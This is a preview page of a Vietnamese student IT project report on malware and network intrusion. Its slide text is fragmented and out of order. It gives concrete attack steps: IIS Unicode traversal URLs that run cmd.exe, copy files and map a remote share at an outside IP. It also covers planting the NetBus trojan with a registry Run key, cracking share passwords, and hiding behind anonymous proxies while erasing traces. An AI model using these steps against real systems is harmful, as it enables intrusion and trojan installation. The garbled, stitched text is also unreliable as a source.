Tìm hiểu một số phần mềm phá hoại và các giải pháp xâm nhập mạng riêng potx

27 370 0
Tìm hiểu một số phần mềm phá hoại và các giải pháp xâm nhập mạng riêng potx

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

1 BÁO CÁO ĐỒ ÁN NGÀNH CÔNG NGHỆ THÔNG TIN Đề tài: TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI & CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG CÓ KẾT NỐI INTERNET Giáo viên hƣớng dẫn: TS. Hồ Văn Canh Sinh viên : Vũ Thị Thu Hằng Lớp : CT702 BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐH DLHP 2 NỘI DUNG CHÍNH Chƣơng 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG TRÊN MẠNG MÁY TÍNH 3 Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG  Thực trạng tấn công của tội phạm trên mạng  Các phƣơng pháp tấn công  Các kỹ thuật xâm nhập mạng 4 Thực trạng tấn công của tội phạm trên mạng  Phần lớn các cuộc tấn công trên mạng đƣợc thực hiện thông qua việc sử dụng một hoặc nhiều công cụ phần mềm.  Phần mềm phá hoại  Các vụ tấn công trên mạng ngày càng gia tăng cả về quy mô và tính chất nguy hiểm.  Những kẻ viết virus có thể gia tăng khả năng điều khiển lên virus của mình sau khi đã phát tán chúng trên mạng. 5 Các phƣơng pháp tấn công  Tấn công trực tiếp  Nghe trộm  Giả mạo địa chỉ  Vô hiệu hoá các chức năng của hệ thống mục tiêu  Sử dụng lỗi của ngƣời quản trị hệ thống 6 Các kỹ thuật xâm nhập mạng  Rình mò (Snooping)  Đánh lừa (Spoofing)  Điệp viên (Agent) 7 Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG  Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng  Triệt để lợi dụng cửa sau để tấn công  Tận dụng các công cụ sẵn có  Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ  Nguyên tắc an toàn  Nguyên tắc phối hợp tấn công 8 Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng  Một hệ thống đảm bảo ANAT máy tính gồm :  Yếu tố tổ chức.  Yếu tố kỹ thuật, công nghệ.  Có hai hƣớng tiếp cận để tìm các lỗ hổng bảo mật:  Từ góc độ chiến thuật  Từ góc độ kỹ thuật.  Một số diễn đàn trao đổi về lỗi bảo mật: http://packetstorm.secuify, http://www.tlsecurity.net, http://www.hackerVN.net 9 Triệt để lợi dụng cửa sau để tấn công  Việc đột nhập vào một hệ thống máy tính nào đó nói chung là rất khó khăn, vì thế sau khi đột nhập ngƣời ta muốn để lại một công cụ nào đó giúp dễ dàng xâm nhập trong những lần sau.  Backdoor / Trojan.  Nguyên tắc hoạt động của Backdoor Máy tấn công Máy đích Giao tiếp bình thƣờng Back Back Giao tiếp cửa sau Hình 3.1.1:Mô hình hoạt động của backdoor 10 Tận dụng các công cụ sẵn có  Sử dụng các công cụ để cấy Trojan lên một máy khác thông qua chia sẻ tài nguyên trên máy đó:  Công cụ bẻ khóa chia sẻ Passware Kit (http://www.LostPassword.com).  Copy file server của Netbus 1.7 (patch.exe) vào thƣ mục bất kỳ ở ổ C:  Sử dụng regedit.exe của Windows để nạp và sửa đổi Registry máy đó (Remote Registry Service) [...]... trang Khám phá điểm yếu, lỗ hổng bảo mật trong hệ thống mục tiêu Sử dụng các công cụ để khai thác các điểm yếu của hệ thống mục tiêu Tiến hành các biện pháp tấn công, thu thập thông tin Tạo đƣờng ngầm (cửa sau), cài cắm “điệp viên” nếu có thể Xóa dấu vết Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công 16 Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU  NETBUS 17 Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU... một vấn để vô cùng rộng, thời gian ngắn và trình độ có hạn nên đồ án còn nhiều hạn chế và chƣa giải quyết trọn vẹn yêu cầu đề tài nêu ra Hƣớng phát triển đề tài của em là sẽ khắc phục các hạn chế để đề tài ngày càng hoàn thiện hơn và tạo ra sản phẩm phần mềm - công cụ ứng dụng trong công nghệ xâm nhập mạng nói riêng và nền công nghệ thông tin nói chung Em xin chân thành cảm ơn ! 27 ... Sử dụng FTP vô danh đăng nhập vào máy tính đích download file system.ini về 20 Cách download và upload file trên IIS mắc lỗi Unicode   Hạn chế: nó không cho phép download tất cả các file Windows NT và Windows 2000 lƣu trữ một bản sao file SAM (Security Account Manager) trong thƣ mục \WINNT\repair\, lƣu trữ thông tin về account sử dụng hệ thống đã đƣợc mã hóa 21 Cách download và upload file trên IIS... 18 Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG TRÊN MẠNG MÁY TÍNH   Tấn công máy mục tiêu bằng cách giành quyền điều khiển hệ thống đó  HTTP (HypeTtext Transfer Protocol – giao thức truyền siêu văn bản)  Giao thức TFTP (Trivial File Transfer Protocol – giao thức truyền file đơn giản)  Giao thức NetBIOS (Network Basic Input/Output System) Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và công cụ bẻ... tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ  Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa đổi, tạo mới file trên server: + Bƣớc 1: Tạo một bản sao mới cmd1.exe của trình thông dịch lệnh DOS: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win nt/system32/cmd1.exe + Bƣớc 2: Ghi thêm một số lệnh vào file autoexec.bat:... dụng các công cụ sẵn có  Thêm vào đó một khóa ở HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\Current\Version\Run hoặc HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Current\Version\Run để chạy patch.exe: Value type: String Value name: Patch Value data C:\windows\patch.exe 11 Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ    Phƣơng pháp. .. an toàn  Sử dụng các procxy vô danh (Anonymous Proxy Server) Gửi yêu cầu Máy của ta Proxy Máy đối Gửi yêu cầu phƣơng Trả lời Trả lời Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy   Để luôn có những thông tin về các proxy miễn phí, có thể thƣờng xuyên truy cập các trang web http://www.blackcode.com, http://www.freeproxies.com Sử dụng một số chƣơng trình nhằm tạo ra các proxy ảo ngay... /winnt/syste m32/cmd.exe?/c+net +use+G:+\\203.160.1.94\MyDisk 22 Cách download và upload file trên IIS mắc lỗi Unicode  Bƣớc 3: Ngƣời ta cần tìm một chƣơng trình điều khiển máy tính, chép vào ổ C: (ổ G:\ trên máy đích) và dùng trình duyệt copy lên đĩa cứng thực sự của server Trên ổ C: của ngƣời ta có Trojan netbus 1.7 với thành phần server là Patch.exe, ngƣời ta sẽ thực hiện lệnh sau ở trình duyệt: http://www.iisaffected.com/scripts/... truy nhập : net use : 25 Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và công cụ bẻ mật khẩu  Nếu tài nguyên đƣợc chia sẻ với mật khẩu thì ta dùng công cụ bẻ mật khẩu, và truy nhập đến tài nguyên theo mật khẩu đã bẻ đƣợc - Passware Kit 26 KẾT LUẬN   Mặc dù đã có nhiều cố gắng nhƣng do Internet là một vấn để vô cùng rộng, thời gian ngắn và trình... System) Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và công cụ bẻ mật khẩu 19 Cách download và upload file trên IIS mắc lỗi Unicode  Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép user truy cập vào thƣ mục \inetpub\ftoproot\ và download các file từ đó: + Bƣớc 1: Copy file download (giả sử là file c:\system.ini) vào thƣ mục \inetpub\ftoproot\ bằng URL: http://www.iisaffected.com/scripts/ . 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG TRÊN MẠNG. tài: TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI & CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG CÓ KẾT NỐI INTERNET Giáo viên hƣớng dẫn: TS. Hồ Văn Canh Sinh viên : Vũ Thị Thu Hằng Lớp : CT702 BỘ GIÁO DỤC VÀ. MÁY TÍNH 3 Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG  Thực trạng tấn công của tội phạm trên mạng  Các phƣơng pháp tấn công  Các kỹ thuật xâm nhập mạng 4 Thực trạng tấn

Ngày đăng: 31/07/2014, 08:21

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan